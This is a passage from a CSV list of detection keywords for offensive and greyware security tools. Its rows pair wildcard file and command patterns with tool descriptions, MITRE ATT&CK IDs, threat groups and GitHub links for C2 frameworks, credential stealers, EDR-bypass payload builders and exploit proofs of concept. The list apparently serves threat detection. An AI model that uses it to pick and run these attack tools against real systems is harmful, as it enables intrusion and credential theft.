servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*./lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*./manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*./Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" +"*./monkey.sh*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*./mythic-cli *","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" +"*./Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*./nmap*","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","1","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"*./ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*./nysm/src/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*./pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" +"*./Passdetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*./Pcredz *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*./Phishing.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*./pwndrop *","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*./PyShell *","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","0","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*./RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*./redirector.py *","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*./rpcrt.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" +"*./rsocx -*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*./scan4all *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*./ScareCrow *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./seth.sh * *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*./snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*./SourcePoint *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*./sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*./t14m4t *","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*./teamserver *","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*./teamserver *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*./test/nmap*/*.nse*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*./update-beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*./Vegile*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*./xhydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*./xrkRce *","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","0","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" +"*./zabbix.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" +"*./zexp check -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" +"*.\dumpy.py*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*.\stager.ps1*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*.admin.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.adminusers.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.api.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.apps.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.asreproast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*.asse.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*.athena_utils *","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*.beta.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.bin -enc rc4 -lang c -k 3 -o *.bin*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc rc4 -lang csharp -k 9*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc rot -lang csharp -k 2 -d*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc rot -lang rust -k 7*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc xor -lang csharp -k 2 -v nickvourd*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.bin -enc xor -lang nim -k 4*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*.blog.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 